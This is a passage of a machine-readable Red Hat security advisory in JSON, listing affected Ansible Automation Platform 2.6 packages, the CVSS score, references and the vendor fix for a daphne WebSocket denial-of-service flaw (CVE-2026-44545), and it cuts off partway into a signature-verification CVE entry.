"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44545"
},
{
"category": "external",
"summary": "RHBZ#2484377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484377"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44545",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44545"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44545",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44545"
},
{
"category": "external",
"summary": "https://github.com/django/daphne/blob/main/CHANGELOG.txt",
"url": "https://github.com/django/daphne/blob/main/CHANGELOG.txt"
}
],
"release_date": "2026-06-03T13:17:42.907000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "daphne: daphne: Denial of Service via excessive WebSocket message size"
},
{
"cve": "CVE-2026-48526",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-05-28T16:01:22.805235+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
